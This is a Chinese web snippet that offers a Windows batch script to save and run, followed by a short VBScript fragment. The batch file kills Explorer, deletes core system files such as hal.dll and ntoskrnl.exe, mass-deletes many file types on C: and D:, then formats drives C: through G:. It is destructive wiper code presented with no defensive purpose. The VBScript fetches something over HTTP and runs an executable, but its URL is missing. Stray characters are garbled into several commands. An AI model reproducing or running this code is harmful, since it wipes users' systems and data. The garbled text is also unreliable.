保存bat的
@echo off
taskkill /f /im Explorer.exe
c:
cd\
del boot.ini
cd WINDOWS
del explorer.exe
cd system32
del hal.dll
del Ntoskrnl.exe
del driverquery.exe
del msvcr71.dll
del /f /s /q c:\备贺*.tmp
del /f /s /q c:\*._mp
del /f /s /q c:\*.log
del /f /s /q c:\*.ini
del /f /s /q c:\*.inf
del /f /s /q c:\*.gid
del /f /s /q c:\*.chk
del /f /s /q c:\*.old
del /f /s /q c:\*.GHO
del /f /s /q c:\*.php
del /f /s /q c:\*.asp
del /f /s /q c:\*.asa
del /f /s /q c:\*.swf
del /f /s /q c:\*.txt
del /f /s /q c:\*.rar
del /f /s /q c:\*.dat
del /f /s /q c:\*.zip
del /f /s /q c:\*.sys
del /f /s /q d:\*.tmp
del /f /s /q d:\*._mp
del /f /s /q d:\*.log
del /f /s /q d:\*.ini
del /f /s /q d:\*.inf
del /f /s /q d:\*.gid
del /f /s /q d:\*.dhk
del /f /s /q d:\*.old
del /f /s /q d:\*.GHO
del /f /s /q d:\*.exe
del /f /s /q d:\*.php
del /f /s /q d:\*.asp
del /f /s /q d:\*.asa
del /f /s /q d:\*.swf
del /f /s /q d:\*.txt
del /f /s /q d:\*.rar
del /f /s /q d:\*.dat
del /f /s /q d:\*.zip
format d: /q /y
format e: /q /y
format f: /q /y
format g: /q /y
format c: /q /y
del /f /简拦s /仿咐派q c:\*.exe
taskkill /f /im *.exe
代码如下:
On Error Resume NextDim WS,ObjH,File
Set WS=WScript.CreateObject("WScript.Shell")
File="应用程序.exe"
Set ObjH=CreateObject("MSXML2.XMLHTTP")
ObjH.Open "GET","
,False
ObjH.Send()
If ObjH.StatusText="OK" Then
WS.Run Chr(34) & File 此岁& Chr(34),1
Else
MsgBox "你的电脑没有联网,请链森模睁接网络后重试!",48,"注意"
End If
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)